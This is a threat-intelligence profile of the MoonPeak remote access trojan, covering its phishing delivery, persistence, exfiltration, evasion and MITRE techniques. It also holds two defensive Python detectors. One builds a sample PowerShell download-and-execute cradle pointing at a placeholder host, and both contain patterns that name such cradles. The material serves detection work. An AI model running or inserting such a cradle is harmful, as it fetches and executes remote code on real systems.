| MoonPeak | |
| --- | --- |
| Type of Malware | Trojan |
| Country of Origin | North Korea |
| Targeted Countries | South Korea |
| Date of Initial Activity | 2024 |
| Associated Groups | UAT-5394 |
| Motivation | Cyberwarfare |
| Attack Vectors | Phishing |
| Targeted Systems | Windows |
Overview
MoonPeak is a remote access trojan (RAT) developed by a North Korean state-sponsored threat actor that Cisco Talos tracks as UAT-5394. It is a variant of XenoRAT, an open-source .NET RAT, and has been modified repeatedly since the group adopted it as part of a broader cyber espionage campaign. Talos' analysis of the malware's infrastructure gives a detailed view of the group's evolving tactics, techniques and procedures (TTPs). Like the RAT it descends from, MoonPeak gives operators remote control of compromised systems, lets them harvest sensitive data and supports long-term surveillance of targets.
The deployment of MoonPeak reflects a change in how the group runs its infrastructure as much as a change in tooling. Talos' findings show that UAT-5394 has moved away from hosting malicious payloads on legitimate cloud services and now stands up its own servers. The shift gives the operators full control of their infrastructure and removes the risk of a cloud provider taking hostile content down. Successive MoonPeak builds have been tested against several command and control (C2) servers, which the group has used to refine and distribute iterations of the malware. The ability to retool and pivot between servers while staying under the radar shows how adaptable the group has become in the face of efforts to track it.
Targets
Information
Public Administration
Individuals
How they operate
Initial Infection and Execution
MoonPeak is typically delivered by spear-phishing emails carrying a malicious attachment or link. The lures are crafted to look legitimate, often impersonating trusted senders or using social engineering to persuade the recipient to open the attachment or follow the link. Once the victim interacts with the lure, the malware is dropped on the system, usually disguised inside a benign-looking file or encoded so that signature-based tools do not flag it. The first stage establishes a foothold, typically by using PowerShell scripts or batch files to launch the payload silently.
Once running, the malware establishes persistence so that it survives a reboot. MoonPeak commonly modifies registry autostart entries (such as Run keys), startup folders or system files to ensure it is relaunched at logon. Persistence matters because the RAT has to keep running unobtrusively in the background for the operators to retain control over long periods; it is also one of the better places to hunt, since each of these locations is finite and auditable.
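The autostart locations named above (Run keys and the Startup folder) are finite and log well, which makes them a practical hunting surface. The following Python detector is an added example written for this page, not code from Cisco Talos or from the MoonPeak/XenoRAT project. It runs over a handful of constructed, Sysmon-style events (the field names EventID, Image, TargetObject, Details and TargetFilename follow Sysmon's registry and file-create conventions, but the events themselves are invented) and scores an autostart entry higher when it points into a user-writable path or is written by a script host, which is an assumed heuristic rather than anything reported about MoonPeak.

```python
import re

# Autostart locations named in the text: Run/RunOnce keys and the Startup folder.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(?:RunOnce|Run)\\[^\\]+$", re.I)
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Start-?up\\", re.I)
# Assumed heuristic (not from the Talos report): a payload dropped by a phishing lure normally lands in a
# user-writable location, so an autostart entry pointing there deserves more weight than one in Program Files.
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Users\\Public|Temp|ProgramData)\\", re.I)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed, Sysmon-style events (EventID 13 = registry value set, 11 = file created). Not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Users\\victim\\AppData\\Roaming\\update.exe",
     "TargetObject": "HKU\\S-1-5-21-111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": "C:\\Users\\victim\\AppData\\Roaming\\update.exe"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svc.lnk"},
    {"EventID": 13, "Image": "C:\\Program Files\\Vendor\\setup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent",
     "Details": "C:\\Program Files\\Vendor\\agent.exe"},
    {"EventID": 13, "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\S-1-5-21-111\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (rule, severity) if the event writes an autostart location, else None."""
    writer = _basename(event.get("Image", ""))
    if event.get("EventID") == 13 and RUN_KEY_RE.search(event.get("TargetObject", "")):
        # The value data is the command that will run at logon; judge the entry by where it points.
        target = event.get("Details", "")
        sev = "high" if USER_WRITABLE_RE.search(target) or writer in SCRIPT_HOSTS else "low"
        return ("run_key_autostart", sev)
    if event.get("EventID") == 11 and STARTUP_DIR_RE.search(event.get("TargetFilename", "")):
        # Installers legitimately drop shortcuts here; a script host or a user-writable writer is the odd case.
        image = event.get("Image", "")
        sev = "high" if writer in SCRIPT_HOSTS or USER_WRITABLE_RE.search(image) else "medium"
        return ("startup_folder_drop", sev)
    return None


def scan(events):
    """Run classify() over an event stream and return the findings in order."""
    findings = []
    for i, ev in enumerate(events):
        hit = classify(ev)
        if hit:
            rule, sev = hit
            findings.append({"index": i, "rule": rule, "severity": sev, "image": ev.get("Image", "")})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']:<6}] {f['rule']:<20} event #{f['index']} by {f['image']}")
```

On the constructed sample the first two events (a Run value pointing into AppData, and cmd.exe dropping a shortcut into the Startup folder) come back high, the vendor installer's Run value comes back low for review rather than being suppressed, and the unrelated Explorer setting produces no finding. The same two regexes work equally well against Windows Security event 4657 or EDR registry telemetry once the field names are mapped.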
Privilege Escalation and Lateral Movement
Once MoonPeak is running, the operators often try to escalate privileges to gain broader access, for example by exploiting known vulnerabilities or system misconfigurations. With administrator or SYSTEM-level rights the RAT can read restricted files, run privileged commands and control critical system resources, which is what allows the intrusion to expand beyond the initially compromised user.
With elevated privileges, the operators can move laterally across the compromised network. Working through the RAT, they can use legitimate protocols such as RDP (Remote Desktop Protocol) or SMB (Server Message Block) to reach and infect additional machines. Lateral movement is central to intrusions into enterprise environments, where each additional host widens access to valuable data and raises the impact of the attack. Because these are legitimate protocols, the detection opportunity lies in unusual source hosts, accounts and timing rather than in the traffic itself.
Data Collection and Exfiltration
As the intrusion progresses, MoonPeak collects sensitive data from the victim's system: login credentials, personally identifiable information (PII), financial data or intellectual property, which is usually the primary objective. The RAT may use keystroke logging, screenshot capture and clipboard monitoring to gather this information, and it can search the file system for specific files or directories that hold data of interest.
Collected data leaves the host over the C2 channel to servers the attackers control, with the traffic encrypted and the data uploaded in chunks to reduce the chance that network monitoring picks it up. Consistent with the infrastructure shift described in the overview, the C2 servers Talos observed were operated by the group itself rather than hosted on legitimate cloud services, so the traffic cannot hide behind a well-known provider's address space; an unfamiliar destination contacted by a process that has no business talking to the internet is the signal to look for.
Evasion and Defense Mechanisms
Throughout its lifecycle, MoonPeak uses a range of techniques to evade security tooling. One is fileless execution: by running in memory and driving legitimate system tools such as PowerShell or WMI (Windows Management Instrumentation), it can run commands without writing files that antivirus software would scan. Another is encrypting its network traffic so that the C2 communication is opaque to content-based detection. Fileless staging reduces host indicators rather than eliminating them: the persistence mechanisms described above still leave an autostart entry, and whatever it points to, on disk.
The malware can also use anti-analysis measures: detecting sandboxes, delaying execution until it is satisfied that it is running on a real host, or obfuscating its code to make reverse engineering harder. These measures are designed to frustrate both automated and manual analysis so that MoonPeak stays undetected for as long as possible.
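Because the evasion described here leans on PowerShell, the most useful triage step is usually to decode an -EncodedCommand argument (base64 over UTF-16LE) and look at what it actually runs. The Python below is an added example for this page, not code from Cisco Talos or the XenoRAT project. The two command lines are constructed (the encoded one is built inside the script from a plain download cradle pointing at example.invalid), and the token list it scans for is an assumed, deliberately small set of indicators, not a published MoonPeak signature.

```python
import base64
import re

# Indicators scanned in both the outer command line and the decoded script. Assumed, deliberately
# small set chosen to match the evasion techniques described above; not a MoonPeak signature.
SUSPICIOUS_TOKENS = [
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)),
    ("nested_base64", re.compile(r"frombase64string", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("wmi_process_create", re.compile(r"win32_process.*\bcreate\b", re.I)),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the spellings seen in practice.
ENC_FLAG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Truncated or non-base64 argument: report nothing rather than a half-decoded string.
        return None


def triage(cmdline):
    """Decode if needed, then report which indicators appear in the outer command line or the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in SUSPICIOUS_TOKENS if rx.search(haystack)]
    return {"encoded": decoded is not None, "script": decoded, "hits": hits, "score": len(hits)}


def encode_for_powershell(script):
    """Encode a script the way powershell.exe -EncodedCommand expects. Used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: one encoded download cradle launched with a hidden window, one routine backup script.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(SAMPLE_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print(result["score"], result["hits"], result["script"] or line)
```

The decoder is the part worth keeping: an alert that only shows the base64 blob tells the analyst nothing, while the decoded cradle immediately exposes the staging URL and the in-memory execution. Scoring both the wrapper flags (hidden window, encoded command) and the decoded body catches cases where each half looks innocuous on its own.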
MITRE Tactics and Techniques
Initial Access (T1566.001, Spearphishing Attachment) – MoonPeak is delivered by spear-phishing emails with malicious attachments or links (links map to T1566.002), which gives the attackers their initial foothold in targeted networks.
Execution (T1059, Command and Scripting Interpreter) – Once delivered, the malware launches its payload through scripts such as PowerShell or batch files, and the RAT itself then executes operator commands on the victim's system.
Persistence (T1547, Boot or Logon Autostart Execution) – MoonPeak stays active across reboots by modifying registry autostart entries or startup folders so that it is relaunched at logon.
Privilege Escalation (T1068, Exploitation for Privilege Escalation) – The malware may exploit vulnerabilities or misconfigurations to gain higher privileges, allowing more impactful actions and access to restricted parts of the network.
Defense Evasion (T1070, Indicator Removal; T1027, Obfuscated Files or Information) – The malware deletes files and modifies the registry to remove traces (T1070, T1112) and uses obfuscation or encryption to hide its code and traffic (T1027).
Credential Access (T1003, OS Credential Dumping) – MoonPeak can extract credentials stored on compromised systems, enabling lateral movement or access to other systems in the target environment.
Discovery (T1083, File and Directory Discovery; T1082, System Information Discovery) – The malware enumerates files, directories and host details in the compromised environment so that the attackers can scope the network and pick targets for exfiltration or further exploitation.
Lateral Movement (T1021, Remote Services) – Once a foothold exists, the operators may use RDP (T1021.001) or SMB (T1021.002) to reach additional systems and expand their access.
Collection (T1119, Automated Collection; T1056.001, Keylogging; T1113, Screen Capture; T1115, Clipboard Data) – MoonPeak gathers credentials, files and other data of value from the compromised system.
Exfiltration (T1041, Exfiltration Over C2 Channel) – Collected data is sent to an attacker-controlled server over the existing C2 channel, typically for espionage purposes.
Command and Control (T1071, Application Layer Protocol) – MoonPeak maintains a C2 channel with remote servers to receive instructions, upload stolen data and update itself; this channel is what lets the operators keep acting on the host after the initial compromise.